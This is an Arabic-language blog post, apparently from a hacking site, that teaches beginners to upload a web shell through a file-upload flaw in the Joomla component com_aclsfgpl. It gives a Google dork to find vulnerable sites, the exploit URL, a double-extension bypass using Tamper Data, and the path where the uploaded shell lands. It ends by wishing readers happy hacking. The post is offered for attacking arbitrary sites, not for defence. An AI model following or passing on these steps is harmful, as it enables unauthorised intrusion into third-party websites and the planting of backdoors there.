تغرة بسيطة لرفع الشل و خصيصا للمبتدئين

بعد أن غبنا قليلا عن مواضيع في مدونة رواد الحماية التغرات ها نحن نعود اليكم من جديد و خصيصا للمبتدئين هده المرة بتغرة قديمة جدا لكن لا تزال موجودة أدعكم مع بعض معلومات التغرة و طرق استغلالها أسفل

معلومات الثغرة   

الثغرة موجود في سكربت للمواقع 
تم اكتشفها سنة 2014

أول شيئ أدخل لجوجل و أكتب

inurl:"index.php?option=com_aclsfgpl" add_form

طريقة الاستغلال   

نضيف بعد رابط الموقع هذا الكود

/index.php?option=com_aclsfgpl&Itemid=[num]&ct=servs1&md=add_form

ليصبح الموقع من xxx.com

الى

xxx.com/index.php?option=com_aclsfgpl&Itemid=[num]&ct=servs1&md=add_form

صيغة الشل   

يرفع الشل على صيغة php.jpg.
ويتم تعديل باداة Tamper Data
عشان نحولة اثنا الرفع من php.jpg. ال php

مسار الشل   

الشل سيكون في مسار

/components/com_aclsfgpl/photos/

و إختراقا هنيئا و تدكر دائما  "أن الهكرز فكرة و الأفكار لا تموت"